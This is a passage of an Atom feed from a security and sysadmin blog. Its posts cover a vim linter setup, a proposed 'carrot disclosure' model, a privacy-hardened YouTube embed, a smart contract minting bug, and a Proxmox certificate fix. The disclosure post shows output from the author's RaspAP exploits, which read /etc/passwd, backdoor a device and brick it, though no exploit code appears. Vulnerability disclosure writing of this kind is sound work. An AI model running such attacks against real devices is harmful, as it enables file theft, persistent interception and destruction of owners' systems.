<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Artificial truth</title><link href="https://dustri.org/b/" rel="alternate"></link><link href="https://dustri.org/b/atom.xml" rel="self"></link><id>https://dustri.org/b/</id><updated>2024-03-10T17:15:00+01:00</updated><entry><title>Using vale with vim</title><link href="https://dustri.org/b/using-vale-with-vim.html" rel="alternate"></link><published>2024-03-10T17:15:00+01:00</published><updated>2024-03-10T17:15:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-03-10:/b/using-vale-with-vim.html</id><summary type="html"><p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goals
of this little corner on the internet was to improve my English, a purpose it
keeps serving. Adding some lightweight tooling to my text editor to push this
goal even further …</p></summary><content type="html"><p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goals
of this little corner on the internet was to improve my English, a purpose it
keeps serving. Adding some lightweight tooling to my text editor to push this
goal even further sounds great.</p>
<p>Like all good software, vale <a href="https://gitlab.alpinelinux.org/alpine/aports/-/tree/master/testing/vale">is
packaged</a>
in Alpine, although it looked a tad neglected, so I sent <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/61919">a
pull-request</a>
to get it updated.
Its configuration is pretty straightforward: a <code>~/.vale.ini</code> file that
says where to store/read its data, plus some preferences. It comes with a
<a href="https://vale.sh/hub/">couple of <em>packages</em></a> for popular styles, like the ones
from <a href="https://vale.sh/hub/microsoft/">Microsoft</a>,
<a href="https://vale.sh/hub/google/">Google</a>, <a href="https://vale.sh/hub/redhat/">RedHat</a>, … then a simple <code>vale sync</code> forces it to
download and store the data, and you're good to go.</p>
<p>While <code>vale</code> can be called from the command line, integration with my text
editor is way more comfy. I'm sure there are a ton of plugins to integrate it
with vim, but I'm not a huge fan of having my text editor run arbitrary code
from the internet, so I threw the following 6 lines in <a href="https://dustri.org/pub/vimrc">my vimrc</a> instead:</p>
<div class="codehilite"><pre><span></span><code><span class="nv">augroup</span><span class="w"> </span><span class="nv">vale</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nv">filereadable</span><span class="ss">(</span><span class="nv">expand</span><span class="ss">(</span><span class="s2">&quot;~/.vale.ini&quot;</span><span class="ss">))</span>
<span class="w"> </span><span class="nv">autocmd</span><span class="w"> </span><span class="nv">FileType</span><span class="w"> </span><span class="nv">markdown</span><span class="w"> </span><span class="nv">setlocal</span><span class="w"> </span><span class="nv">makeprg</span><span class="o">=</span><span class="nv">vale</span>\<span class="w"> </span><span class="o">--</span><span class="nv">output</span><span class="o">=</span><span class="nv">line</span>\<span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="nv">errorformat</span><span class="o">=%</span><span class="nv">f</span>:<span class="o">%</span><span class="nv">l</span>:<span class="o">%</span><span class="nv">c</span>:<span class="o">%</span><span class="nv">o</span>:<span class="o">%</span><span class="nv">m</span>
<span class="w"> </span><span class="nv">nnoremap</span><span class="w"> </span><span class="o">&lt;</span><span class="nv">Leader</span><span class="o">&gt;</span><span class="nv">M</span><span class="w"> </span>:<span class="nv">make</span><span class="o">&lt;</span><span class="nv">CR</span><span class="o">&gt;&lt;</span><span class="nv">CR</span><span class="o">&gt;</span>
<span class="w"> </span><span class="k">end</span>
<span class="nv">augroup</span><span class="w"> </span><span class="k">end</span>
</code></pre></div>
<p>It checks if I have a <code>~/.vale.ini</code> file, and if so sets
<a href="https://vimhelp.org/options.txt.html#%27makeprg%27"><code>makeprg</code></a> to vale and
configures <a href="https://vimhelp.org/quickfix.txt.html#errorformat"><code>errorformat</code></a> to
properly parse vale's output. Now every time I type <code>&lt;Leader&gt; M</code>, I get vale's
diagnostics in my <a href="https://vimhelp.org/quickfix.txt.html">quickfix window</a>.</p>
<p>The next steps would likely be to <s>waste</s> spend some time improving the theme
of the aforementioned window, add some ad hoc rules to vale, and maybe try to
show the diagnostics inline like the spellchecker does.</p></content><category term="sysadmin"></category></entry><entry><title>Carrot disclosure</title><link href="https://dustri.org/b/carrot-disclosure.html" rel="alternate"></link><published>2024-03-08T21:30:00+01:00</published><updated>2024-03-08T21:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-03-08:/b/carrot-disclosure.html</id><summary type="html"><p>Once you have found a vulnerability, you can either sit on it, or disclose it.
There are usually two ways to disclose, with minor variations:</p>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
where one gives time to the vendor to issue a fix before disclosing</li>
<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
where one discloses immediately without notifying anyone before …</li></ol></summary><content type="html"><p>Once you have found a vulnerability, you can either sit on it, or disclose it.
There are usually two ways to disclose, with minor variations:</p>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
where one gives time to the vendor to issue a fix before disclosing</li>
<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
where one discloses immediately without notifying anyone before.</li>
</ol>
<p>I would like to coin a 3<sup>rd</sup> one: <em>Carrot Disclosure</em>, dangling a
<a href="https://en.wikipedia.org/wiki/Carrot_and_stick">metaphorical carrot</a> in front
of the vendor to incentivise change. The main idea is to only publish the
(redacted) output of the exploit for a critical vulnerability, to showcase that the
software is exploitable. Now the vendor has two choices: either perform a
holistic audit of its software, fixing as many issues as possible in the hope
of fixing the showcased vulnerability; or lose users who might not be happy
running known-vulnerable software. Users of this disclosure model are of
course called Bugs Bunnies.</p>
<p>We have all looked at catastrophic web applications, found a ton
of bugs, and decided not to bother reporting them: because there were too
many of them, because we knew that more of them were lurking, because
the vendor is a complete tool and properly disclosing things would take more
time than finding the vulnerabilities did, … This is an
excellent use case for Carrot Disclosure! Of course, for unauditably-large
codebases, it doesn't work: you've got a Linux LPE, who cares.</p>
<p>Interestingly, it shifts the work balance a bit: usually, writing an exploit
is harder than fixing the bug. But here, the vendor has to audit and fix
its entire codebase, for the ~low cost of one (1) exploit, which you don't even
have to publish if you don't want to.</p>
<p>If you want to be extra-nice, you can:</p>
<ul>
<li>Publish the SHA256 of the exploit, so that you can prove
that you weren't making things up, once it's fixed or if you get sued for
whatever frivolous reason, like libel.</li>
<li>Maintain the exploits against new versions, proving that they are still
working.</li>
<li>Publish the exploit once it has been fixed, otherwise you risk having
vendors call your bluff next time; or at least announce that the issue has been
fixed. Since it's 2024 and you don't have hardcoded offsets, you can even
run this in continuous integration.</li>
</ul>
<p>Let's have an example, as a treat. A couple of shitty vulnerabilities for
<a href="https://raspap.com/">RaspAP</a> that took me 5 minutes to find and at least 5
more to write an exploit for each of them:</p>
<div class="codehilite"><pre><span></span><code><span class="gp">$ </span>./read-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">5</span>
<span class="go">[+] Target is running RaspAP</span>
<span class="go">[+] Dumping /etc/passwd</span>
<span class="go">root:x:0:0:root:/root:/bin/bash</span>
<span class="go">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
<span class="go">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
<span class="gp">$ </span>./authed-mitm-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
<span class="go">[+] default login/password in use</span>
<span class="go">[+] backdooring system…</span>
<span class="go">[+] system backdoored, enjoy your permanent MITM!</span>
<span class="gp">$ </span>./brick-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
<span class="go">[+] Target is running RaspAP</span>
<span class="go">[+] Bricking the system…</span>
<span class="go">[+] System bricked!</span>
<span class="gp">$</span>
</code></pre></div>
<p>It looks like there is a low-hanging unauthenticated arbitrary code execution
chainable with a privilege escalation to root as well, but since writing an
exploit would take more than 5 minutes, I can't be bothered, and odds are that
it'll be fixed along with the persistent denial-of-service anyway. Let me know
when you think those are fixed.</p></content><category term="security"></category></entry><entry><title>Youtube video embedding harm reduction</title><link href="https://dustri.org/b/youtube-video-embedding-harm-reduction.html" rel="alternate"></link><published>2024-02-27T14:45:00+01:00</published><updated>2024-02-27T14:45:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-02-27:/b/youtube-video-embedding-harm-reduction.html</id><summary type="html"><p>Embedding external content on a website in the current enshittocene period is
more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
video while reducing its tracking and nuisance capabilities as much as possible:</p>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">iframe</span>
<span class="na">credentialless</span>
<span class="na">allowfullscreen</span>
<span class="na">referrerpolicy</span><span class="o">=</span><span class="s">&quot;no-referrer&quot;</span>
<span class="na">sandbox</span><span class="o">=</span><span class="s">&quot;allow-scripts allow-same-origin&quot;</span>
<span class="na">allow</span><span class="o">=</span><span class="s">&quot;accelerometer &#39;none&#39;; ambient-light-sensor …</span></code></pre></div></summary><content type="html"><p>Embedding external content on a website in the current enshittocene period is
more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
video while reducing its tracking and nuisance capabilities as much as possible:</p>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">iframe</span>
<span class="na">credentialless</span>
<span class="na">allowfullscreen</span>
<span class="na">referrerpolicy</span><span class="o">=</span><span class="s">&quot;no-referrer&quot;</span>
<span class="na">sandbox</span><span class="o">=</span><span class="s">&quot;allow-scripts allow-same-origin&quot;</span>
<span class="na">allow</span><span class="o">=</span><span class="s">&quot;accelerometer &#39;none&#39;; ambient-light-sensor &#39;none&#39;; autoplay &#39;none&#39;; battery &#39;none&#39;; bluetooth &#39;none&#39;; browsing-topics &#39;none&#39;; camera &#39;none&#39;; ch-ua &#39;none&#39;; display-capture &#39;none&#39;; domain-agent &#39;none&#39;; document-domain &#39;none&#39;; encrypted-media &#39;none&#39;; execution-while-not-rendered &#39;none&#39;; execution-while-out-of-viewport &#39;none&#39;; gamepad &#39;none&#39;; geolocation &#39;none&#39;; gyroscope &#39;none&#39;; hid &#39;none&#39;; identity-credentials-get &#39;none&#39;; idle-detection &#39;none&#39;; keyboard-map &#39;none&#39;; local-fonts &#39;none&#39;; magnetometer &#39;none&#39;; microphone &#39;none&#39;; midi &#39;none&#39;; navigation-override &#39;none&#39;; otp-credentials &#39;none&#39;; payment &#39;none&#39;; picture-in-picture &#39;none&#39;; publickey-credentials-create &#39;none&#39;; publickey-credentials-get &#39;none&#39;; screen-wake-lock &#39;none&#39;; serial &#39;none&#39;; speaker-selection &#39;none&#39;; sync-xhr &#39;none&#39;; usb &#39;none&#39;; web-share &#39;none&#39;; window-management &#39;none&#39;; xr-spatial-tracking &#39;none&#39;&quot;</span>
<span class="na">csp</span><span class="o">=</span><span class="s">&quot;sandbox allow-scripts allow-same-origin;&quot;</span>
<span class="na">width</span><span class="o">=</span><span class="s">&quot;560&quot;</span>
<span class="na">height</span><span class="o">=</span><span class="s">&quot;315&quot;</span>
<span class="na">src</span><span class="o">=</span><span class="s">&quot;https://www.youtube-nocookie.com/embed/jfKfPfyJRdk&quot;</span>
<span class="na">title</span><span class="o">=</span><span class="s">&quot;lofi hip hop radio 📚 - beats to relax/study to&quot;</span>
<span class="na">frameborder</span><span class="o">=</span><span class="s">&quot;0&quot;</span>
<span class="na">loading</span><span class="o">=</span><span class="s">&quot;lazy&quot;</span>
<span class="p">&gt;&lt;/</span><span class="nt">iframe</span><span class="p">&gt;</span>
</code></pre></div>
<ul>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/IFrame_credentialless"><code>credentialless</code></a> to load youtube in a blank disposable context,
without access to the origin's network, cookies, and storage data.</li>
<li><code>allowfullscreen</code> because some people like it</li>
<li><code>referrerpolicy</code> set to not leak your <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer">referer</a></li>
<li><code>sandbox</code> to only allow javascript execution and SOP. Downloads, forms,
modals, screen orientation, pointer lock, popups, presentation session,
<a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage_Access_API">storage access</a> and thus third-party cookies,
top-navigation, … are all denied.</li>
<li><code>allow</code> with <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">every single directive</a>
set to "absolutely-fucking-not", and yes, they all have to be set one by one,
and you have to check regularly whether new directives were added,
because there is <a href="https://github.com/w3c/webappsec-permissions-policy/issues/208">no deny-all</a>
in the <a href="https://w3c.github.io/webappsec-permissions-policy/">spec</a>. It seems
that every browser has its own list of directives: Chrome uses <a href="https://github.com/w3c/webappsec-permissions-policy/blob/main/features.md">this one</a>
while Firefox prefers the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">MDN one</a>,
and of course the two differ. No doubt this was designed with privacy, simplicity, maintainability and security in mind.</li>
<li><code>src</code> set to <code>www.youtube-nocookie.com</code> instead of <code>youtube.com</code>. Both
are official Google URLs, but the former doesn't track via cookies,
and disables API and interaction logging. Amusingly, it's
the player used on <code>whitehouse.gov</code>.</li>
<li><code>csp</code> set to <code>sandbox allow-scripts allow-same-origin;</code> for compatibility's
sake, just in case.
I'd love to use a more restrictive policy, but the spec doesn't allow providing
one unless the embedded website explicitly allows it, and of
course youtube doesn't.</li>
<li><code>loading="lazy"</code> in case people don't scroll far enough to see the video: no
need to make them send queries to Google for no reason.</li>
</ul>
<p>Don't forget to put a <code>title</code> for <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#accessibility_concerns">accessibility's sake</a>.</p></content><category term="web"></category></entry><entry><title>A silly "smart" contract bug</title><link href="https://dustri.org/b/a-silly-smart-contract-bug.html" rel="alternate"></link><published>2024-02-16T13:30:00+01:00</published><updated>2024-02-16T13:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-02-16:/b/a-silly-smart-contract-bug.html</id><summary type="html"><p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
interesting here is the bug, can you spot it?</p>
<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint …</span></code></pre></div></summary><content type="html"><p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
interesting here is the bug, can you spot it?</p>
<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint</span><span class="p">)</span><span class="w"> </span><span class="kt">internal</span><span class="w"> </span>virtual<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">fromBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>from<span class="p">];</span>
<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">toBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>to<span class="p">];</span>
<span class="w"> </span><span class="kt">if</span><span class="w"> </span><span class="p">(</span>fromBalance<span class="w"> </span><span class="o">&lt;</span><span class="w"> </span>value<span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span>revert<span class="w"> </span>ERC20InsufficientBalance<span class="p">(</span>from<span class="p">,</span><span class="w"> </span>fromBalance<span class="p">,</span><span class="w"> </span>value<span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span>unchecked<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// Overflow not possible: value &lt;= fromBalance &lt;= totalSupply.</span>
<span class="w"> </span>_balances<span class="p">[</span>from<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>fromBalance<span class="w"> </span><span class="o">-</span><span class="w"> </span>value<span class="p">;</span>
<span class="w"> </span><span class="c1">// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.</span>
<span class="w"> </span>_balances<span class="p">[</span>to<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>toBalance<span class="w"> </span><span class="o">+</span><span class="w"> </span>value<span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>As a hint, look at <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f">this transaction</a>.
Isn't it a cute bugdoor?</p>
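<p>An added example, not the contract's code, modelling the snippet in JavaScript: the bug is that <code>toBalance</code> is read before <code>_balances[from]</code> is written, so a transfer with <code>from == to</code> credits <code>value</code> on top of the not-yet-debited balance and mints tokens. The model runs the snippet as written and a fixed version side by side on a constructed scenario (one holder transferring to themselves) and checks the total-supply invariant a reviewer would test.</p>

```javascript
// Added example, not the contract's code: a JavaScript model of the
// `_update` snippet above, run as written and with a fix, to show why a
// transfer where `from` and `to` are the same address is a problem.

// Token state: address -> balance, as BigInt to mirror uint256 arithmetic.
function makeToken(initialBalances) {
  const balances = new Map();
  for (const [addr, value] of Object.entries(initialBalances)) {
    balances.set(addr, BigInt(value));
  }
  return { balances };
}

function balanceOf(token, addr) {
  return token.balances.get(addr) ?? 0n;
}

function totalSupply(token) {
  let sum = 0n;
  for (const value of token.balances.values()) sum += value;
  return sum;
}

// Faithful model of the snippet: both balances are read before either is
// written (the `mint` flag is never consulted, exactly as in the snippet).
function updateAsWritten(token, from, to, value) {
  const fromBalance = balanceOf(token, from);
  const toBalance = balanceOf(token, to);
  if (value > fromBalance) throw new Error('ERC20InsufficientBalance');
  token.balances.set(from, fromBalance - value);
  // When from === to, toBalance is the pre-debit balance, so the debit
  // above is overwritten and `value` is created out of thin air.
  token.balances.set(to, toBalance + value);
}

// Fixed model: credit the recipient from its current balance after the
// debit has been stored (the equivalent of `_balances[to] += value`).
function updateFixed(token, from, to, value) {
  const fromBalance = balanceOf(token, from);
  if (value > fromBalance) throw new Error('ERC20InsufficientBalance');
  token.balances.set(from, fromBalance - value);
  token.balances.set(to, balanceOf(token, to) + value);
}

// Run one transfer under a given implementation and report the sender's
// balance and the total supply afterwards. Supply must never change on a
// plain transfer; that invariant is the cheapest test for this class of bug.
function runTransfer(update, from, to, value, startBalances) {
  const token = makeToken(startBalances);
  const supplyBefore = totalSupply(token);
  update(token, from, to, BigInt(value));
  return {
    senderBalance: balanceOf(token, from),
    supplyBefore,
    supplyAfter: totalSupply(token),
    supplyConserved: totalSupply(token) === supplyBefore,
  };
}

// Constructed scenario: alice holds 100 and transfers all 100 to herself.
console.log('as written:', runTransfer(updateAsWritten, 'alice', 'alice', 100, { alice: 100 }));
console.log('fixed:     ', runTransfer(updateFixed, 'alice', 'alice', 100, { alice: 100 }));
```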
<p>The snippet is taken from <a href="https://twitter.com/shoucccc/status/1757777764646859121">this tweet</a>,
giving the issue away. Thanks to <a href="https://github.com/kjsman">Jinseo Kim</a> for holding my hand
understanding what was going on there.</p></content><category term="security"></category></entry><entry><title>Fixing the /usr/lib/ssl/certs debacle with Alpine Linux on Proxmox</title><link href="https://dustri.org/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html" rel="alternate"></link><published>2024-02-05T17:00:00+01:00</published><updated>2024-02-05T17:00:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-02-05:/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html</id><summary type="html"><p>There are currently some issues with regard to OpenSSL and Alpine Linux on
Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Proxmox since the 19<sup>th</sup> of January, with some patches sent by
email (sigh) to fix the issue still waiting to land. The root cause being
Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl …</code></p></summary><content type="html"><p>There are currently some issues with regard to OpenSSL and Alpine Linux on
Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Proxmox since the 19<sup>th</sup> of January, with some patches sent by
email (sigh) to fix the issue still waiting to land. The root cause is
Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl/cert.pem'</code> when <code>pct enter</code> is
used, while on Alpine the <code>cert.pem</code> file is in <code>/etc/ssl/cert.pem</code>.</p>
<p>In the meantime, here is what the problem looks like (for
<a href="https://en.wikipedia.org/wiki/Search_engine_optimization">SEO</a>) and how to
hack around it: </p>
<div class="codehilite"><pre><span></span><code><span class="go">root@pve ~ pct enter 122</span>
<span class="gp"># </span>apk<span class="w"> </span>update
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/main: Permission denied</span>
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/community: Permission denied</span>
<span class="go">4 unavailable, 0 stale; 30 distinct packages available</span>
<span class="gp"># </span>^D
<span class="go">root@pve ~ lxc-attach -n 122 </span>
<span class="gp"># </span>apk<span class="w"> </span>update<span class="p">;</span><span class="w"> </span>apk<span class="w"> </span>upgrade
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
<span class="go">v3.18.6-10-g1bb71e18dfb [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]</span>
<span class="go">v3.18.6-9-g41de282e84d [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]</span>
<span class="go">OK: 20069 distinct packages available</span>
<span class="go">OK: 10 MiB in 30 packages</span>
<span class="gp"># </span>^D
<span class="go">root@pve 16:58 ~ </span>
</code></pre></div>
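<p>As an added check, not part of the original post: the two shells above differ
only in the environment they hand to the container, so the quickest way to see the
problem is to list OpenSSL's override variables from inside the container and
drop the ones pointing at paths Alpine doesn't have. The post only names
<code>SSL_CERT_FILE</code>; also handling <code>SSL_CERT_DIR</code> is an assumption based on the
<code>stat(/usr/lib/ssl/certs)</code> errors above, which are a directory lookup.</p>

```sh
#!/bin/sh
# Added example, not from the original post. Run inside the container, e.g.
# right after `pct enter 122`, with: . ./ssl_env.sh; show_ssl_env; sanitize_ssl_env
# Assumption: SSL_CERT_DIR may leak in alongside SSL_CERT_FILE (the post only
# mentions the latter; the stat(/usr/lib/ssl/certs) errors suggest the former).

# Print each OpenSSL override variable and whether its target exists here.
show_ssl_env() {
  for var in SSL_CERT_FILE SSL_CERT_DIR; do
    eval "val=\${$var:-}"
    if [ -z "$val" ]; then
      echo "$var: unset (OpenSSL uses its compiled-in default)"
    elif [ -e "$val" ]; then
      echo "$var=$val (exists)"
    else
      echo "$var=$val (MISSING: certificate verification will fail)"
    fi
  done
}

# Unset SSL_CERT_FILE/SSL_CERT_DIR when they point at nothing, so OpenSSL
# falls back to the distribution's bundle (/etc/ssl/cert.pem on Alpine).
# Variables pointing at existing paths are left alone; the number of
# variables dropped is stored in $dropped.
sanitize_ssl_env() {
  dropped=0
  for var in SSL_CERT_FILE SSL_CERT_DIR; do
    eval "val=\${$var:-}"
    if [ -n "$val" ] && [ ! -e "$val" ]; then
      echo "unsetting $var=$val (path missing in this container)"
      unset "$var"
      dropped=$((dropped + 1))
    fi
  done
}
```

<p>Note that <code>lxc-attach</code> keeps the host's environment by default (<code>--keep-env</code>);
if the host shell itself exports these variables, pass <code>--clear-env</code> so nothing
leaks into the container at all.</p>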
<p>tl;dr: <code>lxc-attach -n 122</code> instead of <code>pct enter 122</code></p></content><category term="sysadmin"></category></entry><entry><title>Musings on CVE-2023-6246 on hardened_malloc</title><link href="https://dustri.org/b/musings-on-cve-2023-6246-on-hardened_malloc.html" rel="alternate"></link><published>2024-01-31T02:00:00+01:00</published><updated>2024-01-31T02:00:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-01-31:/b/musings-on-cve-2023-6246-on-hardened_malloc.html</id><summary type="html"><p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
a couple of hours ago a linear two-step heap buffer overflow in glibc's
<code>syslog()</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags …</span></code></pre></div></summary><content type="html"><p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
a couple of hours ago a linear two-step heap buffer overflow in glibc's
<code>syslog()</code>:</p>
